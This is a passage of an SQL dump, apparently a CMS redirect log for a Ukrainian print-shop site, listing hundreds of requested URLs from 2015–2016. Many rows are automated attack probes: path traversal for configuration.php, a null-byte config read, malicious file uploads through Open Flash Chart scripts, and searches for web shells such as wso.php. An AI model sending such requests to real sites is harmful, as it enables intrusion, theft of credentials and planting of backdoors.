00:00:00',301),(78,'http://ekvatorprint.com.ua/simple-backup/','','','',1,0,'2015-12-11 06:31:10','0000-00-00 00:00:00',301),(79,'http://ekvatorprint.com.ua/wp-content/backup-db/','','','',2,0,'2015-12-11 06:31:13','0000-00-00 00:00:00',301),(80,'http://ekvatorprint.com.ua/admin.php','','http://ekvatorprint.com.ua/admin.php','',75,0,'2015-12-11 15:11:40','0000-00-00 00:00:00',301),(81,'http://ekvatorprint.com.ua/?view=article&id=1%3A2010-11-06-15-56-21&format=pdf&option=com_content','','','',16,0,'2015-12-12 06:23:24','0000-00-00 00:00:00',301),(82,'http://ekvatorprint.com.ua/?view=article&id=1:2010-11-06-15-56-21&format=pdf&option=com_content','','','',2,0,'2015-12-12 15:22:27','0000-00-00 00:00:00',301),(83,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&Type=File&CurrentFolder=/','','','',1,0,'2015-12-13 16:21:22','0000-00-00 00:00:00',301),(84,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFolders&Type=File&CurrentFolder=/','','','',1,0,'2015-12-13 16:21:32','0000-00-00 00:00:00',301),(85,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/php/connector.php?Command=GetFolders&Type=File&CurrentFolder=/','','','',1,0,'2015-12-13 16:21:32','0000-00-00 00:00:00',301),(86,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFolders&Type=File&CurrentFolder=/','','','',1,0,'2015-12-13 16:21:35','0000-00-00 00:00:00',301),(87,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFolders&Type=File&CurrentFolder=/','','','',1,0,'2015-12-13 16:21:35','0000-00-00 00:00:00',301),(88,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFolders&Type=File&CurrentFolder=/','','','',1,0,'2015-12-13 16:21:52','0000-00-00 00:00:00',301),(89,'http://ekvatorprint.com.ua/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFolders&Type=File&CurrentFolder=/','','','',1,0,'2015-12-13 16:22:28','0000-00-00 00:00:00',301),(90,'http://ekvatorprint.com.ua/p<!--','','','',18,0,'2015-12-13 18:50:08','0000-00-00 00:00:00',301),(91,'http://ekvatorprint.com.ua/wp-login.php','','','',910,0,'2015-12-13 19:22:39','0000-00-00 00:00:00',301),(92,'http://ekvatorprint.com.ua/apple-touch-icon-76x76-precomposed.png','','','',69,0,'2015-12-14 15:34:03','0000-00-00 00:00:00',301),(93,'http://ekvatorprint.com.ua/apple-touch-icon-76x76.png','','','',66,0,'2015-12-14 15:34:03','0000-00-00 00:00:00',301),(94,'http://ekvatorprint.com.ua/engine/classes/min/index.php?f=engine/data/dbconfig.php\0test.js','','','',2,0,'2015-12-14 19:20:15','0000-00-00 00:00:00',301),(95,'http://ekvatorprint.com.ua/index.php?option=com_content&view=frontpage','','','',27,0,'2015-12-15 23:22:22','0000-00-00 00:00:00',301),(96,'http://ekvatorprint.com.ua/contact','','http://ekvatorprint.com.ua/contact','',6,0,'2015-12-16 07:05:10','0000-00-00 00:00:00',301),(97,'http://ekvatorprint.com.ua/bitrix/admin/','','http://ekvatorprint.com.ua/bitrix/admin/','',8,0,'2015-12-16 10:05:43','0000-00-00 00:00:00',301),(98,'http://ekvatorprint.com.ua/index.php/admin/','','http://ekvatorprint.com.ua/index.php/admin/','',6,0,'2015-12-16 10:05:44','0000-00-00 00:00:00',301),(99,'http://ekvatorprint.com.ua/media/jui/img/ajax-loader.gif','','http://ekvatorprint.com.ua/administrator/index.php?option=com_installer&view=install','',37,0,'2015-12-17 12:45:53','0000-00-00 00:00:00',301),(100,'http://ekvatorprint.com.ua/uploads/extensions/42010_resizeDown302px133px16.png','','http://ekvatorprint.com.ua/administrator/index.php?option=com_installer&view=install','',4,0,'2015-12-17 12:46:07','0000-00-00 00:00:00',301),(101,'http://ekvatorprint.com.ua/uploads/logos/Logo_2015_resizeDown302px133px16.jpg','','http://ekvatorprint.com.ua/administrator/index.php?option=com_installer&view=install','',1,0,'2015-12-17 12:46:08','0000-00-00 00:00:00',301),(102,'http://ekvatorprint.com.ua/libraries/one_word.php','','','',1,0,'2015-12-19 01:07:47','0000-00-00 00:00:00',301),(103,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=7','','','',13,0,'2015-12-19 02:57:03','0000-00-00 00:00:00',301),(104,'http://ekvatorprint.com.ua/admin','','','',23,0,'2015-12-19 08:25:47','0000-00-00 00:00:00',301),(105,'http://ekvatorprint.com.ua/index.php?option=com_easyblog&view=dashboard&layout=write','','http://ekvatorprint.com.ua/','',233,0,'2015-12-19 11:38:22','0000-00-00 00:00:00',301),(106,'http://ekvatorprint.com.ua/2010-12-01-20-10-21','','','',11,0,'2015-12-20 13:38:06','0000-00-00 00:00:00',301),(107,'http://ekvatorprint.com.ua/services','','','',97,0,'2015-12-20 16:33:01','0000-00-00 00:00:00',301),(108,'http://ekvatorprint.com.ua/<div id=','','','',1,0,'2015-12-20 19:22:30','0000-00-00 00:00:00',301),(109,'http://ekvatorprint.com.ua/></div>','','','',1,0,'2015-12-20 19:22:30','0000-00-00 00:00:00',301),(110,'http://ekvatorprint.com.ua/web.config','','','',4,0,'2015-12-21 08:06:56','0000-00-00 00:00:00',301),(111,'http://ekvatorprint.com.ua/kreotonsystems.php','','','',2,0,'2015-12-21 08:06:56','0000-00-00 00:00:00',301),(112,'http://ekvatorprint.com.ua/wp-admin/ms-users.php','','','',2,0,'2015-12-21 08:06:56','0000-00-00 00:00:00',301),(113,'http://ekvatorprint.com.ua/scripts/drupal.sh','','','',2,0,'2015-12-21 08:06:56','0000-00-00 00:00:00',301),(114,'http://ekvatorprint.com.ua/joomla.xml','','','',4,0,'2015-12-21 08:06:56','0000-00-00 00:00:00',301),(115,'http://ekvatorprint.com.ua/cache/cache.php','','','',2,0,'2015-12-21 14:21:58','0000-00-00 00:00:00',301),(116,'http://ekvatorprint.com.ua/cache/clean.php','','','',1,0,'2015-12-21 14:21:58','0000-00-00 00:00:00',301),(117,'http://ekvatorprint.com.ua/logs/logger.php','','','',1,0,'2015-12-21 14:21:58','0000-00-00 00:00:00',301),(118,'http://ekvatorprint.com.ua/xmlrpc.php','','','',421,0,'2015-12-22 12:42:04','0000-00-00 00:00:00',301),(119,'http://ekvatorprint.com.ua/cookietest.php','','','',2,0,'2015-12-22 18:45:40','0000-00-00 00:00:00',301),(120,'http://ekvatorprint.com.ua/css2015/search.css','','','',1,0,'2015-12-23 04:30:06','0000-00-00 00:00:00',301),(121,'http://ekvatorprint.com.ua/component/content/article?id=article','','','',36,0,'2015-12-25 07:23:30','0000-00-00 00:00:00',301),(122,'http://ekvatorprint.com.ua/bitrix/admin/index.php?lang=en','','','',14,0,'2015-12-25 17:14:35','0000-00-00 00:00:00',301),(123,'http://ekvatorprint.com.ua/admin/login.php','','','',54,0,'2015-12-25 17:14:35','0000-00-00 00:00:00',301),(124,'http://ekvatorprint.com.ua/media/editors/tinymce/skins/lightgray/img/thumb.php','','','',5,0,'2015-12-26 13:21:54','0000-00-00 00:00:00',301),(125,'http://ekvatorprint.com.ua/components/com_media/ajax.php','','','',1,0,'2015-12-26 16:33:42','0000-00-00 00:00:00',301),(126,'http://ekvatorprint.com.ua/2010-12-01-21-22-38','','','',11,0,'2015-12-27 03:24:49','0000-00-00 00:00:00',301),(127,'http://ekvatorprint.com.ua/2011-04-22-05-19-15','','','',8,0,'2015-12-27 07:42:28','0000-00-00 00:00:00',301),(128,'http://ekvatorprint.com.ua/up.php?sendfile=true','','','',1,0,'2015-12-27 18:02:20','0000-00-00 00:00:00',301),(129,'http://ekvatorprint.com.ua/libraries/image-import.php','','','',2,0,'2015-12-27 18:42:34','0000-00-00 00:00:00',301),(130,'http://ekvatorprint.com.ua/wp-admin/admin-ajax.php','','','',301,0,'2015-12-28 12:31:19','0000-00-00 00:00:00',301),(131,'http://www.ekvatorprint.com.ua/favicon.ico','','','',21,0,'2015-12-28 17:05:50','0000-00-00 00:00:00',301),(132,'http://ekvatorprint.com.ua/?option=com_k2','','','',1,0,'2015-12-29 12:10:42','0000-00-00 00:00:00',301),(133,'http://ekvatorprint.com.ua/google26e9ac22041aedf9.html','','','',7,0,'2015-12-29 20:11:49','0000-00-00 00:00:00',301),(134,'http://ekvatorprint.com.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php','','','',23,0,'2015-12-30 05:40:28','0000-00-00 00:00:00',301),(135,'http://ekvatorprint.com.ua/modules/mod_araticlws/mod_araticlws.php','','','',10,0,'2015-12-30 05:40:32','0000-00-00 00:00:00',301),(136,'http://ekvatorprint.com.ua/modules/mod_araticlhess/mod_araticlhess.php','','','',12,0,'2015-12-30 05:40:32','0000-00-00 00:00:00',301),(137,'http://ekvatorprint.com.ua/modules/mod_system/mod_system.php','','','',10,0,'2015-12-30 05:40:33','0000-00-00 00:00:00',301),(138,'http://ekvatorprint.com.ua/modules/mod_xsystem/mod_xsystem.php','','','',4,0,'2015-12-30 05:40:33','0000-00-00 00:00:00',301),(139,'http://ekvatorprint.com.ua/tmp/wso.php','','','',8,0,'2015-12-30 05:40:55','0000-00-00 00:00:00',301),(140,'http://ekvatorprint.com.ua/tmp/img.php','','','',2,0,'2015-12-30 05:40:55','0000-00-00 00:00:00',301),(141,'http://ekvatorprint.com.ua/images/image.php','','','',2,0,'2015-12-30 05:40:55','0000-00-00 00:00:00',301),(142,'http://ekvatorprint.com.ua/images/img.php','','','',3,0,'2015-12-30 05:40:56','0000-00-00 00:00:00',301),(143,'http://ekvatorprint.com.ua/images/404.php','','','',13,0,'2015-12-30 05:40:56','0000-00-00 00:00:00',301),(144,'http://ekvatorprint.com.ua/images/wso.php','','','',10,0,'2015-12-30 05:40:56','0000-00-00 00:00:00',301),(145,'http://ekvatorprint.com.ua/ ОТЗЫВЫ','','','',2,0,'2015-12-30 18:32:46','0000-00-00 00:00:00',301),(146,'http://ekvatorprint.com.ua/cache/cache-db.php','','','',4,0,'2015-12-31 09:01:53','0000-00-00 00:00:00',301),(147,'http://ekvatorprint.com.ua/libraries/simplepie/simplepie.lib.php','','','',3,0,'2015-12-31 11:00:24','0000-00-00 00:00:00',301),(148,'http://ekvatorprint.com.ua/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',7,0,'2016-01-02 19:01:27','0000-00-00 00:00:00',301),(149,'http://ekvatorprint.com.ua/index.php?option=com_content&view=frontpage&format=feed&type=atom','','','',1,0,'2016-01-03 05:22:40','0000-00-00 00:00:00',301),(150,'http://ekvatorprint.com.ua/images/stories/food.php?rf','','','',2,0,'2016-01-03 21:03:58','0000-00-00 00:00:00',301),(151,'http://www.ekvatorprint.com.ua/google26e9ac22041aedf9.html','','','',6,0,'2016-01-04 04:13:21','0000-00-00 00:00:00',301),(152,'http://ekvatorprint.com.ua/2011-06-06-17-41-38','','','',11,0,'2016-01-04 04:18:18','0000-00-00 00:00:00',301),(153,'http://www.ekvatorprint.com.ua/sitemap.xml','','','',4,0,'2016-01-04 23:46:18','0000-00-00 00:00:00',301),(154,'http://ekvatorprint.com.ua/sitemap.xml','','','',333,0,'2016-01-04 23:46:24','0000-00-00 00:00:00',301),(155,'http://ekvatorprint.com.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',21,0,'2016-01-07 00:02:37','0000-00-00 00:00:00',301),(156,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',9,0,'2016-01-07 00:02:41','0000-00-00 00:00:00',301),(157,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',9,0,'2016-01-07 00:02:43','0000-00-00 00:00:00',301),(158,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',23,0,'2016-01-07 00:02:45','0000-00-00 00:00:00',301),(159,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',25,0,'2016-01-07 00:02:47','0000-00-00 00:00:00',301),(160,'http://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',25,0,'2016-01-07 00:02:49','0000-00-00 00:00:00',301),(161,'http://ekvatorprint.com.ua/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',19,0,'2016-01-07 00:02:51','0000-00-00 00:00:00',301),(162,'http://ekvatorprint.com.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',20,0,'2016-01-07 00:02:53','0000-00-00 00:00:00',301),(163,'http://ekvatorprint.com.ua/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',12,0,'2016-01-07 00:02:55','0000-00-00 00:00:00',301),(164,'http://ekvatorprint.com.ua/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',24,0,'2016-01-07 00:02:59','0000-00-00 00:00:00',301),(165,'http://ekvatorprint.com.ua/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',12,0,'2016-01-07 00:03:00','0000-00-00 00:00:00',301),(166,'http://ekvatorprint.com.ua/cfg-contactform-1/inc/upload.php','','','',10,0,'2016-01-07 00:03:03','0000-00-00 00:00:00',301),(167,'http://ekvatorprint.com.ua/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',52,0,'2016-01-07 00:03:04','0000-00-00 00:00:00',301),(168,'http://ekvatorprint.com.ua/cfg-contactform-2/inc/upload.php','','','',9,0,'2016-01-07 00:03:07','0000-00-00 00:00:00',301),(169,'http://ekvatorprint.com.ua/components/com_creativecontactform/fileupload/index.php','','','',20,0,'2016-01-07 00:03:07','0000-00-00 00:00:00',301),(170,'http://ekvatorprint.com.ua/cfg-contactform-3/inc/upload.php','','','',9,0,'2016-01-07 00:03:08','0000-00-00 00:00:00',301),(171,'http://ekvatorprint.com.ua/components/com_sexycontactform/fileupload/index.php','','','',30,0,'2016-01-07 00:03:08','0000-00-00 00:00:00',301),(172,'http://ekvatorprint.com.ua/cfg-contactform-4/inc/upload.php','','','',9,0,'2016-01-07 00:03:08','0000-00-00 00:00:00',301),(173,'http://ekvatorprint.com.ua/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',125,0,'2016-01-07 00:03:09','0000-00-00 00:00:00',301),(174,'http://ekvatorprint.com.ua/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',5,0,'2016-01-07 00:03:11','0000-00-00 00:00:00',301),(175,'http://ekvatorprint.com.ua/cfg-contactform-5/inc/upload.php','','','',9,0,'2016-01-07 00:03:12','0000-00-00 00:00:00',301),(176,'http://ekvatorprint.com.ua/index.php?option=com_myblog&task=ajaxupload','','','',129,0,'2016-01-07 00:03:13','0000-00-00 00:00:00',301),(177,'http://ekvatorprint.com.ua/cfg-contactform-6/inc/upload.php','','','',8,0,'2016-01-07 00:03:16','0000-00-00 00:00:00',301),(178,'http://ekvatorprint.com.ua/cfg-contactform-7/inc/upload.php','','','',9,0,'2016-01-07 00:03:17','0000-00-00 00:00:00',301),(179,'http://ekvatorprint.com.ua/cfg-contactform-8/inc/upload.php','','','',9,0,'2016-01-07 00:03:21','0000-00-00 00:00:00',301),(180,'http://ekvatorprint.com.ua/cfg-contactform-9/inc/upload.php','','','',9,0,'2016-01-07 00:03:36','0000-00-00 00:00:00',301),(181,'http://ekvatorprint.com.ua/cfg-contactform-10/inc/upload.php','','','',9,0,'2016-01-07 00:03:39','0000-00-00 00:00:00',301),(182,'http://ekvatorprint.com.ua/component/content/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',4,0,'2016-01-07 00:03:40','0000-00-00 00:00:00',301),(183,'http://ekvatorprint.com.ua/component/content/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',4,0,'2016-01-07 00:03:41','0000-00-00 00:00:00',301),(184,'http://ekvatorprint.com.ua/component/content/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',4,0,'2016-01-07 00:03:42','0000-00-00 00:00:00',301),(185,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',6,0,'2016-01-07 00:03:44','0000-00-00 00:00:00',301),(186,'http://ekvatorprint.com.ua/component/content/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20','','','',2,0,'2016-01-07 00:03:47','0000-00-00 00:00:00',301),(187,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',6,0,'2016-01-07 00:03:48','0000-00-00 00:00:00',301),(188,'http://ekvatorprint.com.ua/component/content/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',6,0,'2016-01-07 00:03:49','0000-00-00 00:00:00',301),(189,'http://ekvatorprint.com.ua/cfg-contactform-11/inc/upload.php','','','',9,0,'2016-01-07 00:03:52','0000-00-00 00:00:00',301),(190,'http://ekvatorprint.com.ua/component/content/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',4,0,'2016-01-07 00:03:53','0000-00-00 00:00:00',301),(191,'http://ekvatorprint.com.ua/component/content/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',6,0,'2016-01-07 00:03:55','0000-00-00 00:00:00',301),(192,'http://ekvatorprint.com.ua/component/content/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',4,0,'2016-01-07 00:03:59','0000-00-00 00:00:00',301),(193,'http://ekvatorprint.com.ua/component/content/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',4,0,'2016-01-07 00:04:00','0000-00-00 00:00:00',301),(194,'http://ekvatorprint.com.ua/component/content/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',4,0,'2016-01-07 00:04:01','0000-00-00 00:00:00',301),(195,'http://ekvatorprint.com.ua/component/content/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',4,0,'2016-01-07 00:04:01','0000-00-00 00:00:00',301),(196,'http://ekvatorprint.com.ua/component/content/cfg-contactform-1/inc/upload.php','','','',4,0,'2016-01-07 00:04:02','0000-00-00 00:00:00',301),(197,'http://ekvatorprint.com.ua/component/content/cfg-contactform-2/inc/upload.php','','','',4,0,'2016-01-07 00:04:03','0000-00-00 00:00:00',301),(198,'http://ekvatorprint.com.ua/component/content/components/com_sexycontactform/fileupload/index.php','','','',4,0,'2016-01-07 00:04:04','0000-00-00 00:00:00',301),(199,'http://ekvatorprint.com.ua/component/content/components/com_creativecontactform/fileupload/index.php','','','',4,0,'2016-01-07 00:04:06','0000-00-00 00:00:00',301),(200,'http://ekvatorprint.com.ua/component/content/cfg-contactform-3/inc/upload.php','','','',4,0,'2016-01-07 00:04:07','0000-00-00 00:00:00',301),(201,'http://ekvatorprint.com.ua/cfg-contactform-12/inc/upload.php','','','',9,0,'2016-01-07 00:04:08','0000-00-00 00:00:00',301),(202,'http://ekvatorprint.com.ua/component/content/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',4,0,'2016-01-07 00:04:08','0000-00-00 00:00:00',301),(203,'http://ekvatorprint.com.ua/component/content/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',4,0,'2016-01-07 00:04:11','0000-00-00 00:00:00',301),(204,'http://ekvatorprint.com.ua/component/content/index.php?option=com_myblog&task=ajaxupload','','','',4,0,'2016-01-07 00:04:15','0000-00-00 00:00:00',301),(205,'http://ekvatorprint.com.ua/component/content/cfg-contactform-4/inc/upload.php','','','',4,0,'2016-01-07 00:04:29','0000-00-00 00:00:00',301),(206,'http://ekvatorprint.com.ua/cfg-contactform-13/inc/upload.php','','','',9,0,'2016-01-07 00:04:33','0000-00-00 00:00:00',301),(207,'http://ekvatorprint.com.ua/cfg-contactform-14/inc/upload.php','','','',9,0,'2016-01-07 00:04:36','0000-00-00 00:00:00',301),(208,'http://ekvatorprint.com.ua/component/content/cfg-contactform-5/inc/upload.php','','','',4,0,'2016-01-07 00:04:38','0000-00-00 00:00:00',301),(209,'http://ekvatorprint.com.ua/cfg-contactform-15/inc/upload.php','','','',9,0,'2016-01-07 00:04:41','0000-00-00 00:00:00',301),(210,'http://ekvatorprint.com.ua/component/content/cfg-contactform-6/inc/upload.php','','','',4,0,'2016-01-07 00:04:42','0000-00-00 00:00:00',301),(211,'http://ekvatorprint.com.ua/component/content/cfg-contactform-7/inc/upload.php','','','',4,0,'2016-01-07 00:04:49','0000-00-00 00:00:00',301),(212,'http://ekvatorprint.com.ua/component/content/cfg-contactform-8/inc/upload.php','','','',4,0,'2016-01-07 00:04:54','0000-00-00 00:00:00',301),(213,'http://ekvatorprint.com.ua/cfg-contactform-16/inc/upload.php','','','',9,0,'2016-01-07 00:04:59','0000-00-00 00:00:00',301),(214,'http://ekvatorprint.com.ua/component/content/cfg-contactform-9/inc/upload.php','','','',4,0,'2016-01-07 00:05:02','0000-00-00 00:00:00',301),(215,'http://ekvatorprint.com.ua/component/content/cfg-contactform-10/inc/upload.php','','','',4,0,'2016-01-07 00:05:09','0000-00-00 00:00:00',301),(216,'http://ekvatorprint.com.ua/cfg-contactform-17/inc/upload.php','','','',9,0,'2016-01-07 00:05:13','0000-00-00 00:00:00',301),(217,'http://ekvatorprint.com.ua/component/content/cfg-contactform-11/inc/upload.php','','','',4,0,'2016-01-07 00:05:15','0000-00-00 00:00:00',301),(218,'http://ekvatorprint.com.ua/cfg-contactform-18/inc/upload.php','','','',9,0,'2016-01-07 00:05:15','0000-00-00 00:00:00',301),(219,'http://ekvatorprint.com.ua/cfg-contactform-19/inc/upload.php','','','',9,0,'2016-01-07 00:05:19','0000-00-00 00:00:00',301),(220,'http://ekvatorprint.com.ua/component/content/cfg-contactform-12/inc/upload.php','','','',4,0,'2016-01-07 00:05:31','0000-00-00 00:00:00',301),(221,'http://ekvatorprint.com.ua/component/content/cfg-contactform-13/inc/upload.php','','','',4,0,'2016-01-07 00:05:32','0000-00-00 00:00:00',301),(222,'http://ekvatorprint.com.ua/cfg-contactform-20/inc/upload.php','','','',9,0,'2016-01-07 00:05:41','0000-00-00 00:00:00',301),(223,'http://ekvatorprint.com.ua/component/content/cfg-contactform-15/inc/upload.php','','','',4,0,'2016-01-07 00:06:04','0000-00-00 00:00:00',301),(224,'http://ekvatorprint.com.ua/component/content/cfg-contactform-16/inc/upload.php','','','',4,0,'2016-01-07 00:06:26','0000-00-00 00:00:00',301),(225,'http://ekvatorprint.com.ua/component/content/cfg-contactform-17/inc/upload.php','','','',4,0,'2016-01-07 00:06:33','0000-00-00 00:00:00',301),(226,'http://ekvatorprint.com.ua/component/content/cfg-contactform-18/inc/upload.php','','','',4,0,'2016-01-07 00:06:41','0000-00-00 00:00:00',301),(227,'http://ekvatorprint.com.ua/component/content/cfg-contactform-19/inc/upload.php','','','',4,0,'2016-01-07 00:07:06','0000-00-00 00:00:00',301),(228,'http://ekvatorprint.com.ua/component/content/cfg-contactform-20/inc/upload.php','','','',4,0,'2016-01-07 00:07:16','0000-00-00 00:00:00',301),(229,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=6','','','',2,0,'2016-01-07 17:47:34','0000-00-00 00:00:00',301),(230,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=20','','','',5,0,'2016-01-07 18:24:34','0000-00-00 00:00:00',301),(231,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=14','','','',4,0,'2016-01-07 18:58:05','0000-00-00 00:00:00',301),(232,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=19','','','',5,0,'2016-01-07 19:33:48','0000-00-00 00:00:00',301),(233,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=2','','','',10,0,'2016-01-07 21:52:24','0000-00-00 00:00:00',301),(234,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=4','','','',14,0,'2016-01-08 07:28:44','0000-00-00 00:00:00',301),(235,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=15','','','',3,0,'2016-01-08 07:47:28','0000-00-00 00:00:00',301),(236,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=13','','','',10,0,'2016-01-08 08:08:20','0000-00-00 00:00:00',301),(237,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=12','','','',5,0,'2016-01-08 08:09:31','0000-00-00 00:00:00',301),(238,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=3','','','',28,0,'2016-01-08 08:16:52','0000-00-00 00:00:00',301),(239,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=17','','','',3,0,'2016-01-08 10:23:45','0000-00-00 00:00:00',301),(240,'http://ekvatorprint.com.ua/libraries/joomla/language/zdny.php?mgvpzkn','','','',1,0,'2016-01-08 12:24:17','0000-00-00 00:00:00',301),(241,'http://ekvatorprint.com.ua/fckeditor/editor/','','','',4,0,'2016-01-08 13:07:35','0000-00-00 00:00:00',301),(242,'http://ekvatorprint.com.ua/admin/fckeditor/editor/','','','',4,0,'2016-01-09 00:43:00','0000-00-00 00:00:00',301),(243,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=18','','','',4,0,'2016-01-09 02:17:27','0000-00-00 00:00:00',301),(244,'http://ekvatorprint.com.ua/component/content/article?id=article&itemid=10','','','',2,0,'2016-01-09 04:04:06','0000-00-00 00:00:00',301),(245,'http://ekvatorprint.com.ua/plugins/system/debug/ ./. /debugi.php','','http://ekvatorprint.com.ua/plugins/system/debug/%20./.%20/debugi.php','',2,0,'2016-01-10 04:45:23','0000-00-00 00:00:00',301),(246,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:09:59','0000-00-00 00:00:00',301),(247,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:00','0000-00-00 00:00:00',301),(248,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:01','0000-00-00 00:00:00',301),(249,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:01','0000-00-00 00:00:00',301),(250,'http://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:02','0000-00-00 00:00:00',301),(251,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:02','0000-00-00 00:00:00',301),(252,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:03','0000-00-00 00:00:00',301),(253,'http://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:04','0000-00-00 00:00:00',301),(254,'http://ekvatorprint.com.ua/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:04','0000-00-00 00:00:00',301),(255,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:05','0000-00-00 00:00:00',301),(256,'http://ekvatorprint.com.ua/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:06','0000-00-00 00:00:00',301),(257,'http://ekvatorprint.com.ua/component/content/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:07','0000-00-00 00:00:00',301),(258,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:07','0000-00-00 00:00:00',301),(259,'http://ekvatorprint.com.ua/component/content/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:08','0000-00-00 00:00:00',301),(260,'http://ekvatorprint.com.ua/component/content/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:09','0000-00-00 00:00:00',301),(261,'http://ekvatorprint.com.ua/component/content/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/lobex21.php?rf','','','',1,0,'2016-01-10 13:10:10','0000-00-00 00:00:00',301),(262,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:11','0000-00-00 00:00:00',301),(263,'http://ekvatorprint.com.ua/component/content/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=lobex21.php','','','',1,0,'2016-01-10 13:10:11','0000-00-00 